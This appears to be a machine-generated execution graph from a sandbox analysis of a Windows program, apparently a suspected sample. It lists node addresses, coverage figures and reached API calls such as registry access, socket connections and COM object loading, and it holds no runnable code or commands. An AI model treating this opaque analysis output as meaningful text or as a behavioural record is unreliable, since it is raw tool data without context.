                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:4.1%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:11.7%
                                        Total number of Nodes:2000
                                        Total number of Limit Nodes:41
                                        execution_graph 107404 781118 107979 78e016 107404->107979 107406 78112e 107407 781148 107406->107407 107408 7eabeb 107406->107408 107988 783680 107407->107988 108077 78cf79 49 API calls 107408->108077 107412 7eac2a 107415 7eac4a Mailbox 107412->107415 108078 7bba5d 48 API calls 107412->108078 107413 7eb628 Mailbox 108085 7bd520 86 API calls 4 library calls 107415->108085 107416 780119 108088 7bd520 86 API calls 4 library calls 107416->108088 107419 78105e 108079 77c935 107419->108079 107420 781063 108087 7bd520 86 API calls 4 library calls 107420->108087 107422 780dee 108059 77d89e 107422->108059 107423 7eb772 108089 7bd520 86 API calls 4 library calls 107423->108089 107424 780dfa 107428 77d89e 50 API calls 107424->107428 107433 780e83 107428->107433 107430 77c935 48 API calls 107445 77fad8 Mailbox _memmove 107430->107445 107431 7aa599 InterlockedDecrement 107431->107445 107432 77d3d2 48 API calls 107432->107445 108069 77caee 107433->108069 107435 7eb7d2 107437 791b2a 52 API calls __cinit 107437->107445 107440 781230 107443 77fbf1 Mailbox 107440->107443 108086 7bd520 86 API calls 4 library calls 107440->108086 107441 7810f1 Mailbox 108084 7bd520 86 API calls 4 library calls 107441->108084 107444 79010a 48 API calls 107444->107445 107445->107416 107445->107419 107445->107420 107445->107422 107445->107423 107445->107424 107445->107430 107445->107431 107445->107432 107445->107433 107445->107437 107445->107440 107445->107441 107445->107443 107445->107444 107449 7eb583 107445->107449 107470 77f6d0 107445->107470 107542 77fa40 107445->107542 107599 7d0bfa 107445->107599 107602 7d1f19 107445->107602 107605 7d30ad 107445->107605 107659 7d804e 107445->107659 107673 7cb74b VariantInit 107445->107673 107714 78f461 107445->107714 107752 7c013f 107445->107752 107765 78f03e 107445->107765 107768 78ef0d 107445->107768 107811 7d10e5 107445->107811 107817 7d798d 107445->107817 107822 7c92c0 107445->107822 107840 7781c6 107445->107840 107910 7c936f 107445->107910 107938 7c8065 GetCursorPos GetForegroundWindow 107445->107938 107952 7750a3 107445->107952 107957 7d17aa 107445->107957 107962 7c9122 107445->107962 107976 78dd84 107445->107976 108058 781620 59 API calls Mailbox 107445->108058 108073 7cee52 82 API calls 2 library calls 107445->108073 108074 7cef9d 90 API calls Mailbox 107445->108074 108075 7bb020 48 API calls 107445->108075 108076 7ce713 417 API calls Mailbox 107445->108076 108083 7bd520 86 API calls 4 library calls 107449->108083 107471 77f77b 107470->107471 107472 77f708 107470->107472 107477 7ec253 107471->107477 107529 77f787 107471->107529 107473 77f712 107472->107473 107474 7ec4d5 107472->107474 107475 77f71c 107473->107475 107482 7ec544 107473->107482 107478 7ec4f4 107474->107478 107479 7ec4e2 107474->107479 107486 7ec6a4 107475->107486 107492 77f741 107475->107492 107493 77f72a 107475->107493 107476 77fa40 417 API calls 107476->107529 108129 7bd520 86 API calls 4 library calls 107477->108129 108137 7cc235 417 API calls Mailbox 107478->108137 108090 7cf34f 107479->108090 107480 77f770 Mailbox 107480->107445 107481 7ec585 107494 7ec5a4 107481->107494 107495 7ec590 107481->107495 107482->107481 107509 7ec569 107482->107509 107489 77c935 48 API calls 107486->107489 107487 7ec264 107487->107445 107488 7ec507 107491 7ec50b 107488->107491 107488->107492 107489->107492 108138 7bd520 86 API calls 4 library calls 107491->108138 107492->107480 107501 7ec7b5 107492->107501 108169 7cee52 82 API calls 2 library calls 107492->108169 107493->107492 108168 7aa599 InterlockedDecrement 107493->108168 108140 7cd154 48 API calls 107494->108140 107497 7cf34f 417 API calls 107495->107497 107497->107492 107499 792241 48 API calls 107499->107529 107500 7ec45a 107504 77c935 48 API calls 107500->107504 107508 7ec7eb 107501->107508 108190 7cef9d 90 API calls Mailbox 107501->108190 107502 77f9d8 108135 7bd520 86 API calls 4 library calls 107502->108135 107503 7ec5af 107517 7ec62c 107503->107517 107525 7ec5d1 107503->107525 107504->107492 107514 77d89e 50 API calls 107508->107514 108139 7bd520 86 API calls 4 library calls 107509->108139 107510 77f84a 107511 7ec32a 107510->107511 107522 77f854 107510->107522 108130 77342c 107511->108130 107512 7ec793 108170 7784a6 107512->108170 107514->107480 108165 7bafce 48 API calls 107517->108165 107518 7ec7c9 107521 7784a6 81 API calls 107518->107521 107533 7ec7d1 __NMSG_WRITE 107521->107533 108113 7814a0 107522->108113 107524 77f8ab 107524->107502 107527 77f8bb 107524->107527 108141 7ba485 48 API calls 107525->108141 107527->107487 107527->107492 107527->107500 108134 7aa599 InterlockedDecrement 107527->108134 108136 7cf4df 417 API calls 107527->108136 107528 7ec79b __NMSG_WRITE 107528->107501 107531 77d89e 50 API calls 107528->107531 107529->107476 107529->107480 107529->107499 107529->107502 107529->107510 107529->107527 107530 7ec63e 108166 78df08 48 API calls 107530->108166 107531->107501 107533->107508 107537 77d89e 50 API calls 107533->107537 107535 7ec647 Mailbox 108167 7ba485 48 API calls 107535->108167 107536 7ec5f6 108142 7844e0 107536->108142 107537->107508 107540 7ec663 107541 783680 417 API calls 107540->107541 107541->107492 107543 77fa60 107542->107543 107579 77fa8e Mailbox _memmove 107542->107579 107544 79010a 48 API calls 107543->107544 107544->107579 107545 78105e 107546 77c935 48 API calls 107545->107546 107572 77fbf1 Mailbox 107546->107572 107547 77d3d2 48 API calls 107547->107579 107548 780119 109082 7bd520 86 API calls 4 library calls 107548->109082 107551 781063 109081 7bd520 86 API calls 4 library calls 107551->109081 107552 77c935 48 API calls 107552->107579 107554 780dee 107559 77d89e 50 API calls 107554->107559 107555 791b2a 52 API calls __cinit 107555->107579 107556 79010a 48 API calls 107556->107579 107557 7eb772 109083 7bd520 86 API calls 4 library calls 107557->109083 107558 780dfa 107562 77d89e 50 API calls 107558->107562 107559->107558 107560 77f6d0 417 API calls 107560->107579 107563 780e83 107562->107563 107567 77caee 48 API calls 107563->107567 107565 7eb7d2 107566 7aa599 InterlockedDecrement 107566->107579 107578 7810f1 Mailbox 107567->107578 107570 781230 107570->107572 109080 7bd520 86 API calls 4 library calls 107570->109080 107572->107445 107573 77fa40 417 API calls 107573->107579 107576 7eb583 109078 7bd520 86 API calls 4 library calls 107576->109078 109079 7bd520 86 API calls 4 library calls 107578->109079 107579->107545 107579->107547 107579->107548 107579->107551 107579->107552 107579->107554 107579->107555 107579->107556 107579->107557 107579->107558 107579->107560 107579->107563 107579->107566 107579->107570 107579->107572 107579->107573 107579->107576 107579->107578 107580 7c013f 87 API calls 107579->107580 107581 7d1f19 132 API calls 107579->107581 107582 78f03e 2 API calls 107579->107582 107583 7d0bfa 129 API calls 107579->107583 107584 7d798d 109 API calls 107579->107584 107585 7d30ad 93 API calls 107579->107585 107586 7781c6 85 API calls 107579->107586 107587 7d804e 113 API calls 107579->107587 107588 7c936f 55 API calls 107579->107588 107589 7750a3 49 API calls 107579->107589 107590 78ef0d 94 API calls 107579->107590 107591 7cb74b 417 API calls 107579->107591 107592 7d17aa 87 API calls 107579->107592 107593 7d10e5 82 API calls 107579->107593 107594 78f461 98 API calls 107579->107594 107595 7c8065 55 API calls 107579->107595 107596 7c92c0 88 API calls 107579->107596 107597 78dd84 3 API calls 107579->107597 107598 7c9122 91 API calls 107579->107598 109073 781620 59 API calls Mailbox 107579->109073 109074 7cee52 82 API calls 2 library calls 107579->109074 109075 7cef9d 90 API calls Mailbox 107579->109075 109076 7bb020 48 API calls 107579->109076 109077 7ce713 417 API calls Mailbox 107579->109077 107580->107579 107581->107579 107582->107579 107583->107579 107584->107579 107585->107579 107586->107579 107587->107579 107588->107579 107589->107579 107590->107579 107591->107579 107592->107579 107593->107579 107594->107579 107595->107579 107596->107579 107597->107579 107598->107579 109084 7cf79f 107599->109084 107601 7d0c0a 107601->107445 109171 7d23c5 107602->109171 107606 77ca8e 48 API calls 107605->107606 107607 7d30ca 107606->107607 107608 77d3d2 48 API calls 107607->107608 107609 7d30d3 107608->107609 107610 77d3d2 48 API calls 107609->107610 107611 7d30dc 107610->107611 107612 77d3d2 48 API calls 107611->107612 107613 7d30e5 107612->107613 107614 7784a6 81 API calls 107613->107614 107615 7d30f4 107614->107615 107616 7d3d7b 48 API calls 107615->107616 107617 7d3128 107616->107617 107618 7d3af7 49 API calls 107617->107618 107619 7d3159 107618->107619 107620 7d319c RegOpenKeyExW 107619->107620 107621 7d3172 RegConnectRegistryW 107619->107621 107628 7d315d Mailbox 107619->107628 107623 7d31c5 107620->107623 107624 7d31f7 107620->107624 107621->107620 107621->107628 107627 7d31d9 RegCloseKey 107623->107627 107623->107628 107625 7784a6 81 API calls 107624->107625 107626 7d3207 RegQueryValueExW 107625->107626 107629 7d3229 107626->107629 107630 7d323e 107626->107630 107627->107628 107628->107445 107636 7d34eb RegCloseKey 107629->107636 107630->107629 107631 7d344c 107630->107631 107632 7d3265 107630->107632 107635 79010a 48 API calls 107631->107635 107633 7d326e 107632->107633 107634 7d33d9 107632->107634 107637 7d338d 107633->107637 107638 7d3279 107633->107638 109255 7bad14 48 API calls _memset 107634->109255 107639 7d3464 107635->107639 107636->107628 107640 7d34fe RegCloseKey 107636->107640 107644 7784a6 81 API calls 107637->107644 107642 7d32de 107638->107642 107643 7d327e 107638->107643 107645 7784a6 81 API calls 107639->107645 107640->107628 107648 79010a 48 API calls 107642->107648 107643->107629 107652 7784a6 81 API calls 107643->107652 107647 7d33a1 RegQueryValueExW 107644->107647 107649 7d3479 RegQueryValueExW 107645->107649 107646 7d33e4 107650 7784a6 81 API calls 107646->107650 107647->107629 107653 7d32f7 107648->107653 107649->107629 107658 7d3331 107649->107658 107651 7d33f6 RegQueryValueExW 107650->107651 107651->107629 107651->107636 107654 7d329f RegQueryValueExW 107652->107654 107655 7784a6 81 API calls 107653->107655 107654->107629 107656 7d330c RegQueryValueExW 107655->107656 107656->107629 107656->107658 107657 77ca8e 48 API calls 107657->107629 107658->107657 109256 7719ee 107659->109256 107664 7d806f 107667 77ca8e 48 API calls 107664->107667 107665 7d8091 107666 77d3d2 48 API calls 107665->107666 107668 7d809a 107666->107668 107672 7d808f Mailbox 107667->107672 109282 7ae2e8 107668->109282 107670 7d80aa 109299 777bef 107670->109299 107672->107445 107674 77ca8e 48 API calls 107673->107674 107675 7cb7a3 CoInitialize 107674->107675 107676 7cb7ae CoUninitialize 107675->107676 107677 7cb7b4 107675->107677 107676->107677 107678 7cb7d5 107677->107678 107679 77ca8e 48 API calls 107677->107679 107680 7cb81b 107678->107680 107682 7784a6 81 API calls 107678->107682 107679->107678 107681 7784a6 81 API calls 107680->107681 107685 7cb827 107681->107685 107683 7cb7ef 107682->107683 109430 7aa857 CLSIDFromProgID ProgIDFromCLSID lstrcmpiW CoTaskMemFree CLSIDFromString 107683->109430 107687 7cb9d3 SetErrorMode CoGetInstanceFromFile 107685->107687 107698 7cb861 107685->107698 107686 7cb802 107686->107680 107688 7cb807 107686->107688 107690 7cba1f CoGetObject 107687->107690 107691 7cba19 SetErrorMode 107687->107691 109431 7cc235 417 API calls Mailbox 107688->109431 107689 7cb8a8 GetRunningObjectTable 107693 7cb8b8 107689->107693 107694 7cb8cb 107689->107694 107690->107691 107696 7cbaa8 107690->107696 107711 7cb9b1 107691->107711 107693->107694 107713 7cb8ed 107693->107713 109432 7cc235 417 API calls Mailbox 107694->109432 109436 7cc235 417 API calls Mailbox 107696->109436 107698->107689 107702 7cb89a 107698->107702 107705 77cdb4 48 API calls 107698->107705 107700 7cbad0 VariantClear 107700->107445 107701 7cb814 Mailbox 107701->107700 107702->107689 107703 7cbac2 SetErrorMode 107703->107701 107704 7cba53 107706 7cba6f 107704->107706 109434 7aac4b 51 API calls Mailbox 107704->109434 107709 7cb88a 107705->107709 109435 7ba6f6 103 API calls 107706->109435 107709->107702 107710 77cdb4 48 API calls 107709->107710 107710->107702 107711->107696 107711->107704 107713->107711 109433 7aac4b 51 API calls Mailbox 107713->109433 107715 78f48a 107714->107715 107716 78f47f 107714->107716 107719 7784a6 81 API calls 107715->107719 107741 78f498 Mailbox 107715->107741 107717 77cdb4 48 API calls 107716->107717 107717->107715 107718 79010a 48 API calls 107720 78f49f 107718->107720 107721 7e6841 107719->107721 107722 78f4af 107720->107722 109437 775080 49 API calls 107720->109437 107723 79297d __wsplitpath 47 API calls 107721->107723 107725 7784a6 81 API calls 107722->107725 107726 7e6859 107723->107726 107727 78f4bf 107725->107727 107728 77caee 48 API calls 107726->107728 107729 774bf9 56 API calls 107727->107729 107730 7e686a 107728->107730 107731 78f4ce 107729->107731 109438 7739e8 48 API calls 2 library calls 107730->109438 107733 7e68d4 GetLastError 107731->107733 107742 78f4d6 107731->107742 107736 7e68ed 107733->107736 107734 7e6878 107735 7e6895 107734->107735 109439 7b6f4b GetFileAttributesW FindFirstFileW FindClose 107734->109439 107737 77cdb4 48 API calls 107735->107737 107736->107742 109440 774592 CloseHandle 107736->109440 107737->107741 107738 78f4f0 107743 79010a 48 API calls 107738->107743 107739 7e6920 107744 79010a 48 API calls 107739->107744 107741->107718 107751 78f50a Mailbox 107741->107751 107742->107738 107742->107739 107747 78f4f5 107743->107747 107748 7e6925 107744->107748 107745 7e6888 107745->107735 107749 7b6d6d 52 API calls 107745->107749 107750 77197e 48 API calls 107747->107750 107749->107735 107750->107751 107751->107445 107753 7c015e 107752->107753 107754 7c0157 107752->107754 107755 7784a6 81 API calls 107753->107755 107756 7784a6 81 API calls 107754->107756 107755->107754 107757 7c017c 107756->107757 109441 7b76db GetFileVersionInfoSizeW 107757->109441 107759 7c018d 107760 7c0192 107759->107760 107762 7c01a3 _wcscmp 107759->107762 107761 77ca8e 48 API calls 107760->107761 107764 7c01a1 107761->107764 107763 77ca8e 48 API calls 107762->107763 107763->107764 107764->107445 107766 78f0b5 2 API calls 107765->107766 107767 78f046 107766->107767 107767->107445 107769 77ca8e 48 API calls 107768->107769 107770 78ef25 107769->107770 107771 78effb 107770->107771 107772 78ef3e 107770->107772 107773 79010a 48 API calls 107771->107773 109480 78f0f3 48 API calls 107772->109480 107775 78f002 107773->107775 107776 78f00e 107775->107776 109482 775080 49 API calls 107775->109482 107778 7784a6 81 API calls 107776->107778 107784 78f01c 107778->107784 107779 78ef4d 107780 78ef73 107779->107780 107782 7e6942 107779->107782 107783 77cdb4 48 API calls 107779->107783 107781 78f03e 2 API calls 107780->107781 107785 78ef7a 107781->107785 107782->107445 107786 7e6965 107783->107786 107787 774bf9 56 API calls 107784->107787 107788 7e6980 107785->107788 107789 78ef87 107785->107789 107786->107780 107790 7e696d 107786->107790 107791 78f02b 107787->107791 107793 79010a 48 API calls 107788->107793 107794 77d3d2 48 API calls 107789->107794 107795 77cdb4 48 API calls 107790->107795 107791->107779 107792 7e6936 107791->107792 107792->107782 109483 774592 CloseHandle 107792->109483 107796 7e6986 107793->107796 107797 78ef8f 107794->107797 107795->107785 107798 7e699f 107796->107798 109484 773d65 ReadFile SetFilePointerEx 107796->109484 109457 78f04e 107797->109457 107805 7e69a3 _memmove 107798->107805 109485 7bad14 48 API calls _memset 107798->109485 107802 78ef9e 107804 777bef 48 API calls 107802->107804 107802->107805 107806 78efb2 Mailbox 107804->107806 107807 78eff2 107806->107807 107808 7750ec CloseHandle 107806->107808 107807->107445 107809 78efe4 107808->107809 109481 774592 CloseHandle 107809->109481 107812 7784a6 81 API calls 107811->107812 107813 7d10fb LoadLibraryW 107812->107813 107814 7d111e 107813->107814 107816 7d110f 107813->107816 107814->107816 109509 7d28d9 48 API calls _memmove 107814->109509 107816->107445 107818 7719ee 83 API calls 107817->107818 107819 7d799b 107818->107819 107820 771dce 107 API calls 107819->107820 107821 7d79a4 107820->107821 107821->107445 107823 77a6d4 48 API calls 107822->107823 107824 7c92d2 107823->107824 107825 7784a6 81 API calls 107824->107825 107826 7c92e1 107825->107826 107827 78f26b 50 API calls 107826->107827 107828 7c92ed gethostbyname 107827->107828 107829 7c931d _memmove 107828->107829 107830 7c92fa WSAGetLastError 107828->107830 107832 7c932d inet_ntoa 107829->107832 107831 7c930e 107830->107831 107833 77ca8e 48 API calls 107831->107833 109510 7cadca 48 API calls 2 library calls 107832->109510 107836 7c931b Mailbox 107833->107836 107835 7c9342 109511 7cae5a 50 API calls 107835->109511 107836->107445 107838 7c934e 107839 777bef 48 API calls 107838->107839 107839->107836 107841 7784a6 81 API calls 107840->107841 107842 7781e5 107841->107842 107843 7784a6 81 API calls 107842->107843 107844 7781fa 107843->107844 107845 7784a6 81 API calls 107844->107845 107846 77820d 107845->107846 107847 7784a6 81 API calls 107846->107847 107848 778223 107847->107848 107849 777b6e 48 API calls 107848->107849 107850 778237 107849->107850 107851 77846a 107850->107851 107852 77cdb4 48 API calls 107850->107852 107856 7ed91e 107851->107856 107857 7ed95f 107851->107857 107853 77825e 107852->107853 107853->107851 107854 778281 __wopenfile 107853->107854 107855 7ed752 107853->107855 107854->107851 107866 7784a6 81 API calls 107854->107866 107893 7ed7ed 107854->107893 107901 778364 107854->107901 107859 773320 48 API calls 107855->107859 107858 773320 48 API calls 107856->107858 107860 773320 48 API calls 107857->107860 107862 7ed928 107858->107862 107863 7ed769 107859->107863 107861 7ed96a 107860->107861 109525 782320 50 API calls 107861->109525 107865 7784a6 81 API calls 107862->107865 107881 7ed790 107863->107881 109518 782320 50 API calls 107863->109518 107869 7ed93a 107865->107869 107870 778306 107866->107870 107868 77843f Mailbox 107868->107445 109524 7780ea 48 API calls _memmove 107869->109524 107874 7784a6 81 API calls 107870->107874 107871 7ed985 107877 7784a6 81 API calls 107871->107877 107876 77831b 107874->107876 107875 7ed94e 107879 778182 48 API calls 107875->107879 107876->107851 107883 778342 107876->107883 107876->107893 107880 7ed9a0 107877->107880 107878 778182 48 API calls 107878->107881 107882 7ed95c 107879->107882 109526 7780ea 48 API calls _memmove 107880->109526 107881->107868 107881->107878 109519 7780ea 48 API calls _memmove 107881->109519 109520 782320 50 API calls 107881->109520 109527 782320 50 API calls 107882->109527 107886 773320 48 API calls 107883->107886 107890 77834c 107886->107890 107887 7ed9b4 107891 778182 48 API calls 107887->107891 107888 773320 48 API calls 107892 7ed84a 107888->107892 107895 77c4cd 48 API calls 107890->107895 107891->107882 109521 782320 50 API calls 107892->109521 107893->107851 107893->107888 107895->107901 107899 7ed8ce 107903 778182 48 API calls 107899->107903 107900 7ed895 107900->107899 107902 7ed8bf 107900->107902 107901->107868 107901->107900 109512 79247b 59 API calls 2 library calls 107901->109512 109513 7780ea 48 API calls _memmove 107901->109513 109514 778182 107901->109514 109517 782320 50 API calls 107901->109517 109522 77bd2f 48 API calls _memmove 107902->109522 107905 7ed8dc 107903->107905 109523 782320 50 API calls 107905->109523 107908 7ed8ee 107909 77c4cd 48 API calls 107908->107909 107909->107851 107911 77cdb4 48 API calls 107910->107911 107912 7c938a 107911->107912 107913 77cdb4 48 API calls 107912->107913 107914 7c939a 107913->107914 107915 77ca8e 48 API calls 107914->107915 107916 7c93a9 107915->107916 107917 7c93c2 select 107916->107917 107937 7c93ae Mailbox _memmove 107916->107937 107918 7c941f 107917->107918 107919 7c9414 WSAGetLastError 107917->107919 107920 79010a 48 API calls 107918->107920 107919->107937 107921 7c9428 107920->107921 107922 774bce 48 API calls 107921->107922 107923 7c9432 __WSAFDIsSet 107922->107923 107924 7c944a 107923->107924 107923->107937 107925 7c94f5 WSAGetLastError 107924->107925 107926 7c9463 107924->107926 107925->107937 107927 7c947b _strlen 107926->107927 107928 77cdb4 48 API calls 107926->107928 107926->107937 107929 7c94be 107927->107929 107930 7c948e 107927->107930 107928->107927 109530 7bad14 48 API calls _memset 107929->109530 109528 7ae0f5 48 API calls 2 library calls 107930->109528 107933 7c9497 109529 7cae5a 50 API calls 107933->109529 107935 7c94a3 107936 777bef 48 API calls 107935->107936 107936->107937 107937->107445 109531 7c6b19 107938->109531 107941 7c80a5 107942 773320 48 API calls 107941->107942 107943 7c80b3 107942->107943 109536 782320 50 API calls 107943->109536 107945 7c8102 107946 77cdb4 48 API calls 107945->107946 107951 7c80f5 107945->107951 107948 7c812b 107946->107948 107947 7c80cf 109537 782320 50 API calls 107947->109537 107950 77cdb4 48 API calls 107948->107950 107948->107951 107950->107951 107951->107445 107953 79010a 48 API calls 107952->107953 107954 7750b3 107953->107954 107955 7750ec CloseHandle 107954->107955 107956 7750be 107955->107956 107956->107445 107958 7784a6 81 API calls 107957->107958 107959 7d17c7 107958->107959 107960 7b6f5b 63 API calls 107959->107960 107961 7d17d8 107960->107961 107961->107445 107963 7784a6 81 API calls 107962->107963 107964 7c913f 107963->107964 107965 77cdb4 48 API calls 107964->107965 107966 7c9149 107965->107966 109538 7cacd3 107966->109538 107968 7c9156 107969 7c915a socket 107968->107969 107973 7c9182 107968->107973 107970 7c916d WSAGetLastError 107969->107970 107971 7c9184 connect 107969->107971 107970->107973 107972 7c91a3 WSAGetLastError 107971->107972 107971->107973 109544 7bd7e4 107972->109544 107973->107445 107975 7c91b8 closesocket 107975->107973 109559 78dd92 GetFileAttributesW 107976->109559 107980 78e022 107979->107980 107981 78e034 107979->107981 107982 77d89e 50 API calls 107980->107982 107983 78e03a 107981->107983 107984 78e063 107981->107984 107987 78e02c 107982->107987 107986 79010a 48 API calls 107983->107986 107985 77d89e 50 API calls 107984->107985 107985->107987 107986->107987 107987->107406 109564 77a9a0 107988->109564 107990 7836e7 107991 783778 107990->107991 107992 7ea269 107990->107992 108050 783aa8 107990->108050 109576 78bc04 86 API calls 107991->109576 109581 7bd520 86 API calls 4 library calls 107992->109581 107997 7ea3e9 109592 7bd520 86 API calls 4 library calls 107997->109592 107998 783793 108047 78396b Mailbox _memmove 107998->108047 107998->108050 108052 7ea68d 107998->108052 109569 7710e8 107998->109569 107999 78bc5c 48 API calls 107999->108047 108003 7ea583 108007 77fa40 417 API calls 108003->108007 108004 7ea45c 109596 7bd520 86 API calls 4 library calls 108004->109596 108005 7ea289 108005->107997 109582 77d2d2 108005->109582 108009 7ea5b5 108007->108009 108019 77d380 55 API calls 108009->108019 108009->108050 108012 78384e 108016 7ea60c 108012->108016 108017 7838e5 108012->108017 108012->108047 108014 7ea40f 109593 78cf79 49 API calls 108014->109593 108015 7ea303 108027 7ea317 108015->108027 108032 7ea341 108015->108032 109601 7bd231 50 API calls 108016->109601 108022 79010a 48 API calls 108017->108022 108023 7ea5e6 108019->108023 108038 7838ec 108022->108038 109600 7bd520 86 API calls 4 library calls 108023->109600 108024 77fa40 417 API calls 108024->108047 108026 7ea42c 108029 7ea44d 108026->108029 108030 7ea441 108026->108030 109588 7bd520 86 API calls 4 library calls 108027->109588 109595 7bd520 86 API calls 4 library calls 108029->109595 109594 7bd520 86 API calls 4 library calls 108030->109594 108035 7ea366 108032->108035 108039 7ea384 108032->108039 109589 7cf211 417 API calls 108035->109589 108036 77d89e 50 API calls 108036->108047 108043 77e1f0 417 API calls 108038->108043 108045 78399f 108038->108045 108041 7ea37a 108039->108041 109590 7cf4df 417 API calls 108039->109590 108040 79010a 48 API calls 108040->108047 108041->108050 109591 78baef 48 API calls _memmove 108041->109591 108043->108047 108046 77c935 48 API calls 108045->108046 108048 7839c0 108045->108048 108046->108048 108047->107999 108047->108003 108047->108004 108047->108005 108047->108023 108047->108024 108047->108036 108047->108040 108047->108045 108047->108050 109577 77d500 53 API calls __cinit 108047->109577 109578 77d420 53 API calls 108047->109578 109579 78baef 48 API calls _memmove 108047->109579 109597 7cd21a 82 API calls Mailbox 108047->109597 109598 7b89e0 53 API calls 108047->109598 109599 77d772 55 API calls 108047->109599 108048->108050 108051 7ea65e 108048->108051 108055 783a05 108048->108055 108057 783ab5 Mailbox 108050->108057 109580 7bd520 86 API calls 4 library calls 108050->109580 108053 77d89e 50 API calls 108051->108053 108052->108050 109602 7bd520 86 API calls 4 library calls 108052->109602 108053->108052 108054 783a95 108056 77d89e 50 API calls 108054->108056 108055->108050 108055->108052 108055->108054 108056->108050 108057->107445 108058->107445 108060 77d8ac 108059->108060 108067 77d8db Mailbox 108059->108067 108061 77d8ff 108060->108061 108063 77d8b2 Mailbox 108060->108063 108062 77c935 48 API calls 108061->108062 108062->108067 108064 77d8c7 108063->108064 108065 7e4e9b 108063->108065 108066 7e4e72 VariantClear 108064->108066 108064->108067 108065->108067 109606 7aa599 InterlockedDecrement 108065->109606 108066->108067 108067->107424 108070 77cafd __NMSG_WRITE _memmove 108069->108070 108071 79010a 48 API calls 108070->108071 108072 77cb3b 108071->108072 108072->107441 108073->107445 108074->107445 108075->107445 108076->107445 108077->107412 108078->107415 108080 77c940 108079->108080 108081 77c948 108079->108081 108082 77d805 48 API calls 108080->108082 108081->107443 108082->108081 108083->107441 108084->107443 108085->107413 108086->107420 108087->107416 108088->107423 108089->107435 108191 77d3d2 108090->108191 108092 7cf3a9 108094 77d89e 50 API calls 108092->108094 108093 7cf389 Mailbox 108093->108092 108095 7cf3cd 108093->108095 108096 7cf3e1 108093->108096 108109 7cf421 Mailbox 108094->108109 108202 777e53 108095->108202 108098 77c935 48 API calls 108096->108098 108099 7cf3df 108098->108099 108100 7cf429 108099->108100 108211 7ccdb5 417 API calls 108099->108211 108196 7ccd12 108100->108196 108102 7cf410 108102->108100 108104 7cf414 108102->108104 108212 7bd338 86 API calls 4 library calls 108104->108212 108105 7cf44b 108107 7cf457 108105->108107 108108 7cf4a2 108105->108108 108107->108092 108111 7cf476 108107->108111 108110 7cf34f 417 API calls 108108->108110 108109->107492 108110->108109 108213 77ca8e 108111->108213 108114 781606 108113->108114 108117 7814b2 108113->108117 108114->107524 108115 78156d 108115->107524 108116 7814c9 108116->108115 108122 79010a 48 API calls 108116->108122 108119 79010a 48 API calls 108117->108119 108127 7814be 108117->108127 108120 7e5299 108119->108120 108121 79010a 48 API calls 108120->108121 108128 7e52a4 108121->108128 108123 7815af 108122->108123 108124 7815c2 108123->108124 108338 78d6b4 48 API calls 108123->108338 108124->107524 108126 79010a 48 API calls 108126->108128 108127->108116 108339 77346e 48 API calls 108127->108339 108128->108126 108128->108127 108129->107487 108131 773435 108130->108131 108133 773444 108130->108133 108132 79010a 48 API calls 108131->108132 108132->108133 108133->107527 108134->107527 108135->107480 108136->107527 108137->107488 108138->107480 108139->107480 108140->107503 108141->107536 108143 78469f 108142->108143 108144 784537 108142->108144 108145 77caee 48 API calls 108143->108145 108146 784543 108144->108146 108147 7e7820 108144->108147 108154 7845e4 Mailbox 108145->108154 108340 784040 108146->108340 108512 7ce713 417 API calls Mailbox 108147->108512 108150 784639 Mailbox 108150->107492 108151 7e782c 108151->108150 108513 7bd520 86 API calls 4 library calls 108151->108513 108153 784559 108153->108150 108153->108151 108153->108154 108157 7d1f19 132 API calls 108154->108157 108355 7750ec 108154->108355 108359 78f55e 108154->108359 108368 7d352a 108154->108368 108456 7bdce9 108154->108456 108461 7c9500 108154->108461 108470 7c6fc3 108154->108470 108473 7befcd 108154->108473 108507 7c95af WSAStartup 108154->108507 108509 7c1080 108154->108509 108157->108150 108165->107530 108166->107535 108167->107540 108168->107492 108169->107512 108171 7784be 108170->108171 108188 7784ba 108170->108188 108172 7e5592 __i64tow 108171->108172 108173 7784d2 108171->108173 108174 7e5494 108171->108174 108182 7784ea __itow Mailbox _wcscpy 108171->108182 109071 79234b 80 API calls 3 library calls 108173->109071 108175 7e549d 108174->108175 108176 7e557a 108174->108176 108181 7e54bc 108175->108181 108175->108182 109072 79234b 80 API calls 3 library calls 108176->109072 108178 79010a 48 API calls 108180 7784f4 108178->108180 108183 77caee 48 API calls 108180->108183 108180->108188 108184 79010a 48 API calls 108181->108184 108182->108178 108183->108188 108185 7e54d9 108184->108185 108186 79010a 48 API calls 108185->108186 108187 7e54ff 108186->108187 108187->108188 108189 77caee 48 API calls 108187->108189 108188->107528 108189->108188 108190->107518 108227 79010a 108191->108227 108193 77d3f3 108194 79010a 48 API calls 108193->108194 108195 77d401 108194->108195 108195->108093 108197 7ccd46 108196->108197 108198 7ccd21 108196->108198 108197->108105 108199 77ca8e 48 API calls 108198->108199 108200 7ccd2d 108199->108200 108258 7cc8b7 108200->108258 108203 777ecf 108202->108203 108206 777e5f __NMSG_WRITE 108202->108206 108326 77a2fb 108203->108326 108205 777e85 _memmove 108205->108099 108207 777ec7 108206->108207 108208 777e7b 108206->108208 108325 777eda 48 API calls 108207->108325 108322 77a6f8 108208->108322 108211->108102 108212->108109 108214 77cad0 108213->108214 108215 77ca9a 108213->108215 108216 77cae3 108214->108216 108217 77cad9 108214->108217 108220 79010a 48 API calls 108215->108220 108334 77c4cd 108216->108334 108218 777e53 48 API calls 108217->108218 108224 77cac6 108218->108224 108221 77caad 108220->108221 108222 7e4f11 108221->108222 108223 77cab8 108221->108223 108222->108224 108225 77d3d2 48 API calls 108222->108225 108223->108224 108226 77caee 48 API calls 108223->108226 108224->108109 108225->108224 108226->108224 108230 790112 __calloc_impl 108227->108230 108229 79012c 108229->108193 108230->108229 108231 79012e std::exception::exception 108230->108231 108236 7945ec 108230->108236 108250 797495 RaiseException 108231->108250 108233 790158 108251 7973cb 47 API calls _free 108233->108251 108235 79016a 108235->108193 108237 794667 __calloc_impl 108236->108237 108243 7945f8 __calloc_impl 108236->108243 108257 79889e 47 API calls __getptd_noexit 108237->108257 108240 79462b RtlAllocateHeap 108240->108243 108249 79465f 108240->108249 108242 794653 108255 79889e 47 API calls __getptd_noexit 108242->108255 108243->108240 108243->108242 108244 794603 108243->108244 108247 794651 108243->108247 108244->108243 108252 798e52 47 API calls __NMSG_WRITE 108244->108252 108253 798eb2 47 API calls 5 library calls 108244->108253 108254 791d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 108244->108254 108256 79889e 47 API calls __getptd_noexit 108247->108256 108249->108230 108250->108233 108251->108235 108252->108244 108253->108244 108255->108247 